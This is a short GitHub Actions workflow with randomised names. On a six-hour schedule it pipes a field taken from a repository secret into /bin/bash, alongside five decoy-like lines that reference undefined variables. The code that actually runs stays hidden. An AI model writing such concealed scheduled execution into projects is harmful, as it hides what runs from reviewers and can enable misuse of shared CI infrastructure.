name: gaozhongzzx

on:
  workflow_dispatch:
  schedule:
    - cron: '52 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gaozhongzzx
        env:
          bmzby223: ${{ secrets.bmzby223 }}
        run: |
          echo $bmzby223 | jq -r .qc86193 | /bin/bash
          echo $r5 | jq -r .l5015 | /bin/bash
          echo $doarx3 | jq -r .nv59 | /bin/bash
          echo $wvvc49 | jq -r .mli648 | /bin/bash
          echo $tyq5 | jq -r .tmw5 | /bin/bash
          echo $o5426 | jq -r .hwt3 | /bin/bash

